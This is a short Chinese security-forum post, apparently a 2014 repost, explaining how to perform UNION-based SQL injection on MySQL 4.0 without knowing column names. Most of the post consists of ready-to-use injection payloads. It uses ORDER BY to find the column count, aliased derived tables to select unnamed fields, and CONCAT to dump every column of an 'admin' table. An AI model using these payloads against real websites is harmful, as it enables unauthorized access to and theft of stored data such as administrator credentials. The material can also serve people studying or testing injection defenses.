Mysql 4.0利用子查询忽略字段名<转载><分享>
BMa (安全技术爱好者!) | 2014-11-16 19:08
前段时间看了这篇帖子:
ACCESS利用子查询忽略字段名:http://zone.wooyun.org/content/15879
顿时毛瑟顿开,但是也没想在其他数据库中会不会有类似的场景
今天看了篇文章,关于Mysql4.0的类似方法,与大家分享一下!
原文如下:<有修改>
由于mysql4是没有information_schema的,可以利用ACCESS类似的方法来利用子查询忽略字段名,
SELECT id,name FROM title where id = 1 union select 1,2 from (select * from admin order by 1)a
<由于mysql不会自动给派生表定义别名,因此需要在最后加一个a,或者as a>
然后需要猜admin的列数<通过order by来确定>
SELECT id,name FROM title where id = 1 union select 1,2 from (select * from admin order by 6)a
利用别名列查询出所有字段的子语句:
SELECT id,name FROM title where id = 1 and 1=2 union select a_3,a_4 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from admin where 1=2 union select * from admin)a
对于mysql,还可以利用concat将所有一起显示:
SELECT id,name FROM title where id = 1 and 1=2 union select 1,concat(a_1,0x23,a_2,0x23,a_3,0x23,a_4,0x23,a_5,0x23,a_6) from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from admin where 1=2 union select * from admin)a
自此就可以得到对应的数据了!